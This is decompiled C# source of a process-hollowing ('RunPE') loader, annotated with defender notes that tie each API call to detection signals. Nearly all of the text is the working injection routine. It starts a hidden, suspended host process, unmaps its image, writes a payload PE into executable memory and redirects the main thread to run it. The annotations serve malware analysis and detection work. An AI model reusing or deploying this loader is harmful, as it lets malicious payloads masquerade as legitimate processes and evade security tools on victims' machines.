// Token: 0x0600009E RID: 158 RVA: 0x000097EC File Offset: 0x000079EC
// Decompiled process-hollowing ("RunPE") loader. The in-memory PE image in
// `bytes` is written over a freshly created, suspended host process
// (`surrogateProcess`, optionally with `optionalArguments` appended to its
// command line) whose main thread is then redirected and resumed.
//
// Defender notes: the observable API sequence below is the canonical hollowing
// signature and is what host telemetry (EDR / ETW / sandbox rules) should key
// on: CreateProcess with creation flag 4 (CREATE_SUSPENDED), GetThreadContext,
// ReadProcessMemory, NtUnmapViewOfSection on the child, VirtualAllocEx with
// protection 64 (PAGE_EXECUTE_READWRITE) at the payload's preferred base,
// repeated WriteProcessMemory, a context write via SetThreadContext, then
// ResumeThread after a fixed one-second delay.
//
// Returns true once ResumeThread has been called (return values of the
// write/context calls are never checked), false if CreateProcess fails or any
// exception is thrown — every exception is swallowed, so a malformed or
// truncated `bytes` buffer simply yields false.
public static bool InjectPE(byte[] bytes, string surrogateProcess, string optionalArguments = "")
{
    try
    {
        IntPtr zero = IntPtr.Zero;
        // Stands in for PROCESS_INFORMATION; from usage below [0] is the
        // process handle and [1] the primary thread handle.
        IntPtr[] array = new IntPtr[4];
        mRunpe.STARTUPINFO startupinfo = default(mRunpe.STARTUPINFO);
        // PE header fields of the payload, read by fixed offset with no bounds
        // or signature validation (e_lfanew, section count, header size).
        int num = BitConverter.ToInt32(bytes, 60);
        int num2 = (int)BitConverter.ToInt16(bytes, num + 6);
        IntPtr value = new IntPtr(BitConverter.ToInt32(bytes, num + 84));
        startupinfo.cb = Strings.Len(startupinfo);
        // wShowWindow = 0 (SW_HIDE) with dwFlags 257 = STARTF_USESHOWWINDOW |
        // STARTF_USESTDHANDLES: the host is started hidden — a GUI host binary
        // with no window is itself a weak indicator worth correlating.
        startupinfo.wShowWindow = 0;
        startupinfo.dwFlags = 257;
        // Dead code: this Process object is never started or used.
        Process process = new Process();
        process.StartInfo.CreateNoWindow = false;
        if (!string.IsNullOrEmpty(optionalArguments))
        {
            surrogateProcess = surrogateProcess + " " + optionalArguments;
        }
        // Creation flag 4 = CREATE_SUSPENDED: the host never runs its own code.
        if (!mRunpe.CreateProcess(null, new StringBuilder(surrogateProcess), zero, zero, false, 4, zero, null, ref startupinfo, array))
        {
            return(false);
        }
        // 179 DWORDs = sizeof(CONTEXT) on x86; 65538 = 0x10002 = CONTEXT_INTEGER.
        // Together with the IntPtr.ToInt32() calls below this confirms the
        // loader only works against 32-bit hosts (ToInt32 throws on a 64-bit
        // pointer, which the catch turns into a false return).
        uint[] array2 = new uint[179];
        array2[0] = 65538u;
        if (mRunpe.GetThreadContext(array[1], array2))
        {
            // Reads a pointer-sized value 8 bytes past the register captured
            // in context slot 41 (presumably the PEB pointer in EBX, giving
            // PEB.ImageBaseAddress — verify against the x86 CONTEXT layout).
            IntPtr baseAddr = new IntPtr((long)((ulong)array2[41] + 8UL));
            IntPtr zero2 = IntPtr.Zero;
            IntPtr value2 = new IntPtr(4);
            IntPtr zero3 = IntPtr.Zero;
            // NtUnmapViewOfSection == 0 (STATUS_SUCCESS) means the host's own
            // image has been evicted; an unmap of the main module in a
            // suspended child is a high-confidence detection event.
            if (mRunpe.ReadProcessMemory(array[0], baseAddr, ref zero2, (int)value2, ref zero3) && (ulong)mRunpe.NtUnmapViewOfSection(array[0], zero2) == 0UL)
            {
                // Preferred ImageBase and SizeOfImage of the payload; 12288 =
                // MEM_COMMIT | MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE.
                // The result of VirtualAllocEx is not checked for NULL.
                IntPtr intPtr = new IntPtr(BitConverter.ToInt32(bytes, num + 52));
                IntPtr intPtr2 = new IntPtr(BitConverter.ToInt32(bytes, num + 80));
                IntPtr lpBaseAddress = mRunpe.VirtualAllocEx(array[0], intPtr, intPtr2, 12288, 64);
                // Decompiler artifact: declared but never assigned and passed by
                // value, so the byte count written is discarded and none of the
                // WriteProcessMemory results are examined.
                int lpNumberOfBytesWritten;
                // Headers first (SizeOfHeaders bytes), then each section in turn.
                mRunpe.WriteProcessMemory(array[0], lpBaseAddress, bytes, (uint)((int)value), lpNumberOfBytesWritten);
                int num3 = num2 - 1;
                int num4 = 0;
                int num5 = num3;
                for (int i = num4; i <= num5; i++)
                {
                    // One 40-byte IMAGE_SECTION_HEADER per iteration, read from
                    // the payload with no check that it lies inside `bytes`.
                    int[] array3 = new int[10];
                    Buffer.BlockCopy(bytes, num + 248 + i * 40, array3, 0, 40);
                    byte[] array4 = new byte[array3[4] - 1 + 1];
                    Buffer.BlockCopy(bytes, array3[5], array4, 0, array4.Length);
                    intPtr2 = new IntPtr(lpBaseAddress.ToInt32() + array3[3]);
                    intPtr = new IntPtr(array4.Length);
                    mRunpe.WriteProcessMemory(array[0], intPtr2, array4, (uint)((int)intPtr), lpNumberOfBytesWritten);
                }
                // Patches the same 4-byte field read above so the child reports
                // the new base, then points context slot 44 (presumably EAX,
                // the start-thread entry register) at the payload's
                // AddressOfEntryPoint. A SetThreadContext on the primary thread
                // of a never-resumed child is the last pre-execution indicator.
                intPtr2 = new IntPtr((long)((ulong)array2[41] + 8UL));
                intPtr = new IntPtr(4);
                mRunpe.WriteProcessMemory(array[0], intPtr2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)((int)intPtr), lpNumberOfBytesWritten);
                array2[44] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num + 40));
                mRunpe.SetThreadContext(array[1], array2);
            }
        }
        // Fixed delay before resume; note the thread is resumed even when the
        // context read or the unmap failed above, leaving a suspended host
        // that simply runs its original image.
        Thread.Sleep(1000);
        mRunpe.ResumeThread(array[1]);
    }
    catch (Exception ex)
    {
        // All failures are silently collapsed into false; `ex` is unused.
        return(false);
    }
    return(true);
}
// P/Invoke declaration for kernel32 CreateProcess (the [DllImport] attribute
// and DLL name are not shown on this page — decompiler output). `creation` is
// the dwCreationFlags value (4 = CREATE_SUSPENDED in the caller above) and
// `pInfo` is an IntPtr[4] used in place of a PROCESS_INFORMATION struct, so
// the process and thread handles come back in pInfo[0] and pInfo[1]. A
// `commandLine` built from caller-supplied strings is passed without quoting.
private static extern bool CreateProcess(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, [In] ref mRunpe.STARTUPINFO lpStartupInfo, IntPtr[] pInfo);